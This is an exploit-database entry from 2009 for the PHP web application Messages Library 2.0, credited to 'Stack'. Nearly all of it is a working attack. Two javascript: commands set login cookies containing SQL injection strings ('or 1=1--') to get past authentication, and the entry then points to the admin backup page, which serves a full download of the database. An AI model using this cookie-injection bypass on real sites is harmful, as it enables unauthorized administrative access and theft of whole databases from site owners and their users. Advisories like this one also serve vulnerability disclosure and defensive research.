Messages Library 2.0 - Insecure Cookie Handling
Author: Stack
type: webapps
platform: php
port:
date_added: 2009-06-30
date_updated:
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url:
# Messages Library 2.0 <= Arbitrary Database Download Vulnerability
########################################
#[*] Founded & Exploited by : Stack
########################################
Bypass with
javascript:document.cookie = "SaphpLesson_Name=admin' or 1=1--; path=/";
javascript:document.cookie = "SaphpLesson_Password=' or 1=1--; path=/";
After Exec
http://localhost/sms/admin/backup.php
and you got the database download
# milw0rm.com [2009-07-01]